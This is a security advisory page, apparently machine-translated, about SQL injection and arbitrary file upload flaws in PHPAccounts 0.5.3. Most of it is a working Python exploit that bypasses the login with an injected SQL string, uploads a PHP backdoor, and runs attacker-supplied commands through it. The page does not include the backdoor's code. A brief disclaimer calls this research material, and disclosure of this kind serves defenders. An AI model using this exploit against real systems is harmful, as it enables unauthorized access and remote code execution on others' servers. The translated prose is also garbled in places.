PHPAccounts SQL injection and arbitrary file upload vulnerability-vulnerability warning-the black bar safety net

2012-06-26T00:00:00
ID MYHACK58:62201234186
Type myhack58
Reporter 佚名
Modified 2012-06-26T00:00:00

Description

Release date: 2012-06-11

Update date: 2012-06-21

Affected system:

phpaccounts phpaccounts

Description:

--------------------------------------------------------------------------------

BUGTRAQ ID: 5 3 9 2 0

PHPAccounts is for small businesses, freelancers, consulting firms, the simple Web-based Account Application.

PHPAccounts in the presence ofSQL injectionvulnerability and arbitrary file upload vulnerability these vulnerabilities stem from not validating user-supplied data. An attacker can exploit the vulnerability control application, execute arbitrary code, access or modify data, or in the underlying database exploit these vulnerabilities.

<*source: loneferret

*>

Test method:

--------------------------------------------------------------------------------

Warning

The following procedures(methods)may carry offensive, for security research and teaching purposes. The user at your own risk!

!/ usr/bin/python

import re, mechanize

import urllib, sys

print "\n[*] phpAcounts v. 0. 5. 3 Remote Code Execution"

print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys. argv) != 3):

print "[*] Usage: poc.py <RHOST> <RCMD>"

exit(0)

rhost = sys. argv[1]

rcmd = sys. argv[2]

print "[*] Bypassing Login ."

try:

br = mechanize. Browser()

br. open("http://%s/phpaccounts/index.php?frameset=true" % rhost)

assert br. viewing_html()

br. select_form(name="loginForm")

br. select_form(nr=0)

br. form['Login_Username'] = "x' or '1'#"

br. form['Login_Password'] = "pwnd"

print "[*] Triggering SQLi .."

br. submit()

except:

print "[*] Oups..Something happened"

exit(0)

print "[*] Uploading Shell ..."

try:

br. open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)

assert br. viewing_html()

br. select_form(nr=0)

br. form["Preferences[LETTER_HEADER]"] = 'test'

br. form. add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")

br. submit(nr=2)

except:

print "[*] Upload didn't work"

exit(0)

print "[*] Command Executed\n"

try:

shell = urllib. urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))

print shell. read()

except:

print "[*] Oups."

exit(0)

Recommendations:

--------------------------------------------------------------------------------

Manufacturers patch:

phpaccounts

-----------

The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version:

http://phpaccounts.com/